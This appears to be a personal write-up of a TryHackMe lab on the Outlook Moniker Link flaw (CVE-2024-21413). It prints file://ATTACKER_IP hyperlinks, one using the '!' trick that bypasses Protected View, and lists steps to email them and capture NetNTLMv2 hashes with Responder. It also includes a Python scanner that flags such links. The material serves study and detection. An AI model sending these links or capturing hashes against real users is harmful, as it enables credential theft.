harigvk21/Moniker-Link
Moniker-Link

This vulnerability bypasses Outlook's security mechanisms when handling a specific type of hyperlink known as a Moniker link. [[Metasploit - msfconsole]]

An attacker can abuse this by sending the victim an email containing a malicious Moniker link; once the hyperlink is clicked, Outlook sends the user's NTLM credentials to the attacker. [[Moniker Link (CVE-2024-21413)]]

#Protocol/NTLM #Protocol/SMB

Publish date: Feb 13th, 2025
MS article: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413
Impact: Remote Code Execution & Credential Leak
Severity: Critical

Learning Objectives

  • How the vulnerability works
  • Understand Outlook's "Protected View"
  • Using the vulnerability to leak credentials from an Outlook client
  • Detection and mitigation measures

Moniker link: Outlook can render emails as HTML. It parses ordinary hyperlinks such as HTTP and HTTPS, but it can also open other link types, such as Moniker links.

Outlook's "Protected View" opens attachments, hyperlinks and similar content in read-only mode, blocking things such as macros. By using a "file://" Moniker link in our hyperlink, we can instruct Outlook to attempt to access a file on a network share:

<a href="file://ATTACKER_IP/test">Click me</a>

SMB (#Protocol/SMB) is used for this access, and it authenticates with the user's local credentials. Outlook's Protected View will normally block this attempt. The vulnerability is triggered by appending the special character "!" followed by a piece of text to the Moniker link, which bypasses Outlook's Protected View; Outlook then tries to reach the file share over SMB, authenticating with NetNTLMv2. Example:

<a href="file://ATTACKER_IP/test!exploit">Click me</a>

Note that the share does not need to exist on the remote device: an authentication attempt is made regardless, so the victim's Windows NetNTLMv2 hash is sent to the attacker.
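The two links above give a mail gateway or an analyst a concrete pattern to look for. As an added example, not part of this writeup or the TryHackMe room, the following Python scans an HTML mail body for file:// hyperlinks and flags the ones carrying the "!" marker described above. The sample mail body and the ATTACKER_IP placeholder are constructed; treating a percent-encoded "%21" like a literal "!" is an assumption made to avoid a trivial evasion, not behaviour the page documents.

```python
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit


class _HrefCollector(HTMLParser):
    """Collect every href attribute found on <a> tags in an HTML body."""

    def __init__(self):
        super().__init__()
        self.hrefs = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so "HREF" is seen as "href".
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                self.hrefs.append(value)


def classify_href(href):
    """Return a finding dict for a file:// hyperlink, or None for any other scheme.

    'remote' is True when the link names a host (a UNC path the client would
    resolve over SMB, triggering NTLM authentication); 'bypass' is True when the
    path carries the "!" marker that defeats Protected View in CVE-2024-21413.
    """
    url = href.strip()
    parts = urlsplit(url)
    if parts.scheme != "file":  # urlsplit already lower-cases the scheme
        return None
    # Assumption: decode percent-encoding so "%21" is treated like a literal "!".
    path = unquote(parts.path)
    return {
        "href": url,
        "host": parts.netloc,
        "remote": bool(parts.netloc),
        "bypass": "!" in path,
    }


def scan_html(html):
    """Scan an HTML mail body and return a finding for every file:// hyperlink."""
    collector = _HrefCollector()
    collector.feed(html)
    return [f for f in (classify_href(h) for h in collector.hrefs) if f]


# Constructed sample mail body: one ordinary link, one plain UNC link
# (Protected View would block it) and one carrying the "!" bypass.
SAMPLE_MAIL_HTML = """
<html><body>
<p>Quarterly report: <a href="https://example.test/report">download</a></p>
<p><a href="file://ATTACKER_IP/test">Click me</a></p>
<p><a HREF="FILE://ATTACKER_IP/test!exploit">Click me</a></p>
</body></html>
"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_MAIL_HTML):
        level = "ALERT" if finding["bypass"] else "WARN"
        print(f"{level}: {finding['href']} (host={finding['host']!r}, remote={finding['remote']})")
```

Any file:// link that names a host is worth a warning on its own, since a plain UNC reach already provokes an SMB authentication attempt if Protected View is not in the way; the "!" form is the one that escalates to an alert.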

Challenge Name

Platform: THM
Category: [[Moniker Link (CVE-2024-21413)]]
Difficulty: Easy
Date: 2026/04/04

Description

The objective, as the attacker, is to craft an email to the victim containing a Moniker Link that bypasses Outlook's "Protected View"; the victim's client will then attempt to load a file from our attacking machine, and the victim's NetNTLMv2 hash is captured.

SMB uses NTLM (or Kerberos) to authenticate users before granting access to shared resources. When you connect to \\server\share, SMB handles the file transfer while NTLM/Kerberos handles proving who you are.

Steps

  1. We have two machines: the attacker's machine and the victim's machine.
  2. Take an attacker and a victim email account. The attacker needs to set up their own #Protocol/SMTP server.
  3. To authenticate to the mail server, the attacker needs a password.
  4. The attacker crafts an email with a Moniker link and sends it to the victim. Clicking the link bypasses Outlook's Protected View, the victim's system tries to load a file from the attacker's machine, and the victim's NetNTLMv2 hash is captured.
  5. Responder is started on the attacker's machine; it poisons network responses to capture NTLM hashes (#technique/T1557-001).
  6. Create a new file on the AttackBox using the terminal: nano exploit.py
  7. Some initial setup is needed on our AttackBox before running the Python script:
    • Modify the Moniker Link (line #12) in our PoC to reflect the IP address of our AttackBox
    • Replace the MAILSERVER placeholder on line #31 with MACHINE_IP
  8. Run the exploit using python3 filename.py. When prompted, enter the attacker's password.
  9. The victim receives the email and clicks the "Click me" hyperlink.
  10. Return to Responder on the attacker's machine.
  11. Responder captures the victim's NetNTLMv2 hash and shows it on the attacker's screen.

Commands used:

nano filename.py
# open a text editor and paste the crafted email, changing the attacker's IP and the target IP
python3 filename.py
# run the script and type the attacker's password for mail-server authentication, after which the email is delivered
responder -I interface
# select the appropriate interface on the attacker machine; it listens for the incoming NetNTLMv2 hash when the target clicks the Moniker link
# Responder output shows the captured hash

What I Learned

  • Key concept: the way Outlook handles external links using the moniker architecture for seamless parsing of various hyperlinks, while letting the user open the contents in a read-only Protected View that blocks macros
  • Key concept: the way this Protected View can be exploited by making slight changes to the Moniker link, and the concept of network sharing, where the functionality of SMB and NTLM has been exploited.
  • Relevant MITRE ATT&CK technique: #technique/T1557-001
